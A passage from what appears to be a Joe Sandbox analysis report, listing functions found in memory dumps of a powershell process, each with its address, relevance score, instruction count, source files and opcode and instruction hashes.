                          • Instruction ID: 019249e7c71dc36d8fa786c45322263aee7d6aba6fcf474ed1fd6a9e3622fe46
                          • Opcode Fuzzy Hash: 8b555e52f8d126596c0e677aa63d3c1243c4772205ef02d02bb739b724165fc1
                          • Instruction Fuzzy Hash: 1D613A75E04248DFCB14CFA9C984A9DFBF5FF88310F148169E918AB355EB34A845CB60
                          Function 04BFBBA0 Relevance: .2, Instructions: 155COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ab014cf97ccda3a4997cdfe301d8b823aa00a4bbb2a35d2e284a21bb82c94946
                          • Instruction ID: fa7e5ceb413d9444985b5cbe01059b799f6d1ce6721eeb47f475eb5106c24c27
                          • Opcode Fuzzy Hash: ab014cf97ccda3a4997cdfe301d8b823aa00a4bbb2a35d2e284a21bb82c94946
                          • Instruction Fuzzy Hash: 09612875E00248DFCB14DFA9C984A9DFBF5FF88310F148169E918AB264EB34AC45CB60
                          Function 04BF7808 Relevance: .2, Instructions: 153COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 78cc9abe5d8a279bae72cc83e40707a251cf3e4650b88d218956e174d2e9cde4
                          • Instruction ID: 2b5d7b21fe62b09b78da5ee0ee1c0c1afb447592b70bba079b813fc03ad5bbfd
                          • Opcode Fuzzy Hash: 78cc9abe5d8a279bae72cc83e40707a251cf3e4650b88d218956e174d2e9cde4
                          • Instruction Fuzzy Hash: 5F51BE347042149FD7049B6AD854A6A77EAFFC8314F5484A9E60ACB356EF35EC06CBA0
                          Function 07A83CCF Relevance: .1, Instructions: 121COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 800ae6f0e305389ed144bde71b39fd8f2213a88fbdc469a0e1e91e4e3274cda6
                          • Instruction ID: 464e898105793e22afcefba40e1ccf5381c6fb988634421f0345583e05cc8f04
                          • Opcode Fuzzy Hash: 800ae6f0e305389ed144bde71b39fd8f2213a88fbdc469a0e1e91e4e3274cda6
                          • Instruction Fuzzy Hash: AA4139F0A11202CFCFA1AF64C541B6EBBB3AFC5A50F0484A6D920AF251D735DD46C7A1
                          Function 04BF2B00 Relevance: .1, Instructions: 107COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b4d57ea7c6c02465122affeea45640f74dfbe466ed8ac4265a1fe07441dd64d
                          • Instruction ID: 158a0666cf19c53ebb6386fad9810667d9ffb0e6d4caa230f36d0e8ea79d21d4
                          • Opcode Fuzzy Hash: 2b4d57ea7c6c02465122affeea45640f74dfbe466ed8ac4265a1fe07441dd64d
                          • Instruction Fuzzy Hash: 79413974A005059FCB09CF59C5989AEFBB1FF48310B118599D919AB365C732FC91CBA0
                          Function 04BFC468 Relevance: .1, Instructions: 101COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f0dc719e528ef0f9f68b761142bfe6f5f229b902ce079c2da9afc2ae93256c72
                          • Instruction ID: ff502ee3c2d7c80bc4142f96413dd75d6d51640f402acc86234952eca21f30c8
                          • Opcode Fuzzy Hash: f0dc719e528ef0f9f68b761142bfe6f5f229b902ce079c2da9afc2ae93256c72
                          • Instruction Fuzzy Hash: CE318D353006009FD709DF68E844B9ABBAAEFC4311F018579D64ACB3A5DF75A849CBA1
                          Function 04BF7099 Relevance: .1, Instructions: 94COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 20a23ae7c96ec8e4cb9e426bf83ac20f31f65999d0ea9966c978057e9d38347e
                          • Instruction ID: a3670f588b33bd483c2a61add00d7045d680d331180d7233efdc1e5ede381e9b
                          • Opcode Fuzzy Hash: 20a23ae7c96ec8e4cb9e426bf83ac20f31f65999d0ea9966c978057e9d38347e
                          • Instruction Fuzzy Hash: B5313B34B041458FCB14DFA9C958AAABBF2EF8D315F1840E8D906AB391DB31ED05CB60
                          Function 04BFAF40 Relevance: .1, Instructions: 88COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 168a20e91f561e7980da4dc5e61e912ca6ac19fb1ebf42c6ed91aa4cfc4ee1cf
                          • Instruction ID: 2a8b5b20e092c4fb9e386c9bdf595c30058f79b9caf5e96804e1d0530b2ac735
                          • Opcode Fuzzy Hash: 168a20e91f561e7980da4dc5e61e912ca6ac19fb1ebf42c6ed91aa4cfc4ee1cf
                          • Instruction Fuzzy Hash: DB315074E002098FDB08DF79D9947ADBBF6EF88310F159069E509EB394EB34AC458B54
                          Function 04BFAF50 Relevance: .1, Instructions: 84COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 42fbeff57a6f0253c00ff506748f2f361ee5cb1c87b099616001d65faccd99d5
                          • Instruction ID: 5b0db7c6dbfe175a976c5800d0f562c24948598c729123d3ea01e16b4f86394e
                          • Opcode Fuzzy Hash: 42fbeff57a6f0253c00ff506748f2f361ee5cb1c87b099616001d65faccd99d5
                          • Instruction Fuzzy Hash: FA316170E002099FDB08DF79D9947AEBBF6EF88310F159069E509EB394EB34AC058B54
                          Function 04BFE129 Relevance: .1, Instructions: 81COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b54a84b1255d68c8ec2d4c864a6ee19fa026fa0fe9c02223f0a3bf06816ab6dc
                          • Instruction ID: 41c093cb3f3c103235a994d9f5cc6739a299ed1010abb3f2b0352317bf5be07c
                          • Opcode Fuzzy Hash: b54a84b1255d68c8ec2d4c864a6ee19fa026fa0fe9c02223f0a3bf06816ab6dc
                          • Instruction Fuzzy Hash: C6314A74A002048FDB18DFA9D598AADBBF2FF4C314F158569D406EB3A0DB71AC85CB90
                          Function 04BF7050 Relevance: .1, Instructions: 79COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e99fbf89e41b80499c7c06fd2c0946cc1bbc24a19b00b4f3a302183fcfbe9376
                          • Instruction ID: e5f7386f25f49a4f0f9ad6829dc14f0772ae14455100965828d4382a0b6f07cf
                          • Opcode Fuzzy Hash: e99fbf89e41b80499c7c06fd2c0946cc1bbc24a19b00b4f3a302183fcfbe9376
                          • Instruction Fuzzy Hash: 60315A34B042448FCB04DFA5C958AA9BBF1EF8D305F1840D9D906AB3A1DB31ED09CB60
                          Function 04BFE138 Relevance: .1, Instructions: 77COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3984fb72d4d2dbfc7b85b80928d1326fd0e32cfc8e3e477f8d2660ca2e83f602
                          • Instruction ID: 7683875fa6f2761ac142c7c754c106b3f511a0797b873ac3bc23ac568f529fcc
                          • Opcode Fuzzy Hash: 3984fb72d4d2dbfc7b85b80928d1326fd0e32cfc8e3e477f8d2660ca2e83f602
                          • Instruction Fuzzy Hash: B1310B74A002058FCB18DFA9D458AADBBF6FF8C214F154569D406EB3A0DB71AC85CB90
                          Function 031BF3D8 Relevance: .1, Instructions: 76COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2141224082.00000000031BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031BD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_31bd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6526319f581e47bb463adf3aae03b3680632a9994cbd8d145f039b4aea15c1d
                          • Instruction ID: faa72e93a9c4331c1ea53beee037408b902551c2d08d71b0ed0485f9e2ba33fb
                          • Opcode Fuzzy Hash: d6526319f581e47bb463adf3aae03b3680632a9994cbd8d145f039b4aea15c1d
                          • Instruction Fuzzy Hash: 3B21F176608200EFCB09DF64D9C0B26BF79FB8C314F24C5A9E9094A256C33AD457CBA1
                          Function 04BF94D0 Relevance: .1, Instructions: 73COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1b9fcd9c8def022bde1b9618a00f990e9057d15ac35a1c7426a23fcbe018a42e
                          • Instruction ID: 1ec9369b187584f5456d0a595a2e519f8e659b5e97f76d1935d843be2464fbba
                          • Opcode Fuzzy Hash: 1b9fcd9c8def022bde1b9618a00f990e9057d15ac35a1c7426a23fcbe018a42e
                          • Instruction Fuzzy Hash: C931EEB0A053408EDB60CF6AC48838AFFF6EF88310F28C09EC54D9B215C734A085CB64
                          Function 04BFDDB9 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ab12aab14d695f8803d838a9c3f2ed3c79238e142adeaadd408e81709b54532d
                          • Instruction ID: 7a7c5fa061f4c8827125da8cb1043495809a44279ca9fe590a1569958ac4b200
                          • Opcode Fuzzy Hash: ab12aab14d695f8803d838a9c3f2ed3c79238e142adeaadd408e81709b54532d
                          • Instruction Fuzzy Hash: CB210730B041409BCF118B24CC14BEE7FB9DF95314F1488EED64BDB292DA616809DBA1
                          Function 031BF02C Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2141224082.00000000031BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031BD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_31bd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b27999c57d1e48a182663da6deebcd388de233bd5d536b086743b951a7d4469
                          • Instruction ID: ac43fcff411f94a52aced017e83e7255bbad9375d6a9b3dbc56e2ddcfa28523b
                          • Opcode Fuzzy Hash: 2b27999c57d1e48a182663da6deebcd388de233bd5d536b086743b951a7d4469
                          • Instruction Fuzzy Hash: FC21F275604244DFCB14DF24D9C4B66BFBAEB88314F24C5A9D9094B266C33AD447CA61
                          Function 04BF94E0 Relevance: .1, Instructions: 69COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c44220cc95588b2223942303012c58e123d7422f4275016dd90f54fb8662498f
                          • Instruction ID: 6a38556e7ed9332e99a495a132fe7ef93759bcd6439ed6c3391315b376ed53db
                          • Opcode Fuzzy Hash: c44220cc95588b2223942303012c58e123d7422f4275016dd90f54fb8662498f
                          • Instruction Fuzzy Hash: 19219AB0A053448EEBA0CF6AC48838AFFF6EF88310F28C45ED91D97205D774A485CB64
                          Function 04BF7744 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 962a70c4aff05cc1ba9396e1294b999562cb123b4879a05f97f778ccfd7177eb
                          • Instruction ID: 09a23a474b08da750ff6f5d9d6bcbe58093ff9e61ff22358087fe8d8f34e3f26
                          • Opcode Fuzzy Hash: 962a70c4aff05cc1ba9396e1294b999562cb123b4879a05f97f778ccfd7177eb
                          • Instruction Fuzzy Hash: FF112B397006188FCB04DBA8E9809DD77FAEFCC651B0040A5EA09DB365DB34ED168B90
                          Function 07A81990 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9e47ba24242f8284b4415ae27142ed67136e1774a325e312645ec3fed0b5d5d8
                          • Instruction ID: 8de307d59813a08b917c2a5ce9311ac925cbacbdad5823c19d2c4970e2366230
                          • Opcode Fuzzy Hash: 9e47ba24242f8284b4415ae27142ed67136e1774a325e312645ec3fed0b5d5d8
                          • Instruction Fuzzy Hash: 6711B2F1A0420ADFCFA0EF59C584B6ABBF1FB95251F44816EE5288B211D730D842CBA1
                          Function 031BF3D3 Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2141224082.00000000031BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031BD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_31bd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                          • Instruction ID: 01955339c5369315b43c293e06b3a5beaa4534c0c63f4ed9cea792b996ce3e70
                          • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                          • Instruction Fuzzy Hash: FA218C76504240DFCB06CF10D9C4B56BF72FB88314F28C5A9D9494A656C33AD46ACBA1
                          Function 031BF027 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2141224082.00000000031BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031BD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_31bd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                          • Instruction ID: 70a1d3b9165eafd177eab6a292d033ca92c2a97db7a6f612c82ae2d6821bea47
                          • Opcode Fuzzy Hash: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                          • Instruction Fuzzy Hash: 0F11D075504280CFCB11CF14D9C4B15FF72FB48314F28C6A9D8494B666C33AD44ACB61
                          Function 04BFBDC0 Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 80552b35a6f665b3f68a263416535cf9a283105eac183622b551e35125718402
                          • Instruction ID: 10d835151eeef356285c1fec0dfdc61b0b7d4d234dfc0701b04f6d89397e9150
                          • Opcode Fuzzy Hash: 80552b35a6f665b3f68a263416535cf9a283105eac183622b551e35125718402
                          • Instruction Fuzzy Hash: 6011AD356083449FD718DB69D998A997FE0EF46310F2584EEE18ECB6A2DA21FC45C701
                          Function 04BFE0B0 Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a9383cde7eab089da8127639963879ba8d1c73fb45156b4c6c30b5eeddd17798
                          • Instruction ID: 146ebaae59955d35575a207d4a751e0e939924819e5a9d786e743096c1fc61be
                          • Opcode Fuzzy Hash: a9383cde7eab089da8127639963879ba8d1c73fb45156b4c6c30b5eeddd17798
                          • Instruction Fuzzy Hash: 28110935204754CFC728DF35D480866BBF6EF8931532089ADD54A8B7A0CB36F845CB50
                          Function 04BFDF78 Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 42ed33feedecf8e0eaa4ed930da8cba8795ca35e15cadc04071431bb7a8ac22a
                          • Instruction ID: eaf0321534b9ced67be4db6526dc5b95b2a3ca65268f62f968c6596df33ee3b6
                          • Opcode Fuzzy Hash: 42ed33feedecf8e0eaa4ed930da8cba8795ca35e15cadc04071431bb7a8ac22a
                          • Instruction Fuzzy Hash: 4701B535B00214CFCB119F74E818AAEBBFAFB88315F00406DE50AD3382DB31A911CB91
                          Function 031BD006 Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2141224082.00000000031BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031BD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_31bd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0189229c144f4dc5c210ff167179703b5ad0d338653289c553d55d16ac439706
                          • Instruction ID: 3d6efd8ce7662cc1e7c71e24717e8aa4a8b55d3cd5c06afa089abecc1e035df6
                          • Opcode Fuzzy Hash: 0189229c144f4dc5c210ff167179703b5ad0d338653289c553d55d16ac439706
                          • Instruction Fuzzy Hash: 400169710093809FD7168F259C94792BFB8EF57220F0984DBE8888F2A7C2695845CB72
                          Function 031BD01D Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2141224082.00000000031BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031BD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_31bd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 150e2c25588a68522cb13c35620cc8d431611b81d58324bbd8a262b282c3c0ae
                          • Instruction ID: aa83d4695195e2962dd8869d9cd569416a786d54f83aa79272c2e57380af3f74
                          • Opcode Fuzzy Hash: 150e2c25588a68522cb13c35620cc8d431611b81d58324bbd8a262b282c3c0ae
                          • Instruction Fuzzy Hash: B901F7310053009BD728CE15D984BA7FFACEF49320F1CC46AED480A246C3799841CAB1
                          Function 04BFBFF0 Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 54d869f1ee21cb07699b06a504e2e8f3f9cd34a8f935e6f5598fbda851b51b2f
                          • Instruction ID: e521407c30c9d3cb6d10cc800676dae225c7044aabe599cc9f29dc4e5b52b336
                          • Opcode Fuzzy Hash: 54d869f1ee21cb07699b06a504e2e8f3f9cd34a8f935e6f5598fbda851b51b2f
                          • Instruction Fuzzy Hash: DAF0C8713093951FE7018A795C54E777FE9EF86610B1580ABF994C7292D9B1CC048760
                          Function 04BFC000 Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 66501cf0a01015a227d818b948a08a769d65b2c12bb0e43d6cdd40949e4ae046
                          • Instruction ID: 07460006b9e3e7ae2e5bcdd4ce8e03cb1f6bb7d182055b6ed9e303677a8ea2f5
                          • Opcode Fuzzy Hash: 66501cf0a01015a227d818b948a08a769d65b2c12bb0e43d6cdd40949e4ae046
                          • Instruction Fuzzy Hash: EEF0BE323082641FD7008A7A9C84DBBBFEDEFC9620B04407AF948C3351DAB1CC0086A0
                          Function 04BF7A22 Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a74b7e7c9768a877e355a195dfa2fa80f2c4f69bd4d08e6fd2cda9156b3815c0
                          • Instruction ID: a83e18f336621eb1a03712d4dbafb69dcdea412360b98e686ac49821f0734fa3
                          • Opcode Fuzzy Hash: a74b7e7c9768a877e355a195dfa2fa80f2c4f69bd4d08e6fd2cda9156b3815c0
                          • Instruction Fuzzy Hash: C8F0F6353083505FC7119B69E88496F7FE9EF8922171405AED14DDB662DF34AC0AC350
                          Function 031BD9A7 Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2141224082.00000000031BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031BD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_31bd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e0cede6ac077eb7137b78f0d2b4edf2ea96c814329ba382b4aaaf9410d723d28
                          • Instruction ID: 0f288808527452629f26215739df228197a81cd311aa1940654f33509571e046
                          • Opcode Fuzzy Hash: e0cede6ac077eb7137b78f0d2b4edf2ea96c814329ba382b4aaaf9410d723d28
                          • Instruction Fuzzy Hash: 01F0F976200604AFD724CF0AD985C67FBBDEFD4670719C55AE84A4B611C771EC41CEA0
                          Function 04BF91B8 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f57265ab1ec37a89677c7ed0e3ca2d80761bad9f2a698570e8eb5fad7974129
                          • Instruction ID: 5cb281060710939e41fdef737c94b12c81fc156e3524e1e1c21880eea668b5d9
                          • Opcode Fuzzy Hash: 4f57265ab1ec37a89677c7ed0e3ca2d80761bad9f2a698570e8eb5fad7974129
                          • Instruction Fuzzy Hash: 2DF028756043005BD7059F24D0283EA3765EFC1308F11809AC5456F2D6CE352806CBA0
                          Function 04BF9238 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d2a128977c2e1de5378a54d6563ba048129e5647b4c4f7c24c75afc10cf3edcb
                          • Instruction ID: e84a3d9cf3667e566b8d2df0e7b43324f61d921181b54743cc4f69c5eef2c34f
                          • Opcode Fuzzy Hash: d2a128977c2e1de5378a54d6563ba048129e5647b4c4f7c24c75afc10cf3edcb
                          • Instruction Fuzzy Hash: 89F0E2716053045FD7609FB8D8A939ABFE4EB01310F0488AEE29DDB2C3DB356885CB90
                          Function 04BF7A30 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b639025362d1dd6f3dad1c237a231c9e54083a9da084fe97e1898722c78627c
                          • Instruction ID: 2e7217cd3e19391c2bd70b3031adebe9617862404924b26f3298a074de4790d3
                          • Opcode Fuzzy Hash: 5b639025362d1dd6f3dad1c237a231c9e54083a9da084fe97e1898722c78627c
                          • Instruction Fuzzy Hash: 2FF027353042145FCB109A69E840A6F7BEDEF8C260B10052DE14EC3610DF30BC068790
                          Function 031BD998 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2141224082.00000000031BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031BD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_31bd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1fd52997f0a8d349899e4ebcc3d08ce78e9f046175a5f7b861b89ef9c67f0bb8
                          • Instruction ID: 9af943e1220d3f7a48d31b1998b2eb2597d82c16c2226b62b4eb935cb2be21ad
                          • Opcode Fuzzy Hash: 1fd52997f0a8d349899e4ebcc3d08ce78e9f046175a5f7b861b89ef9c67f0bb8
                          • Instruction Fuzzy Hash: 54F01D75110680AFD725CF06CD85D63BBB9EFC9660B198499E85A4B712C731FC42CF60
                          Function 04BF775F Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 434774363e86f0957f8f5912af5dff5506af596da337555e4bda7c6086ac9437
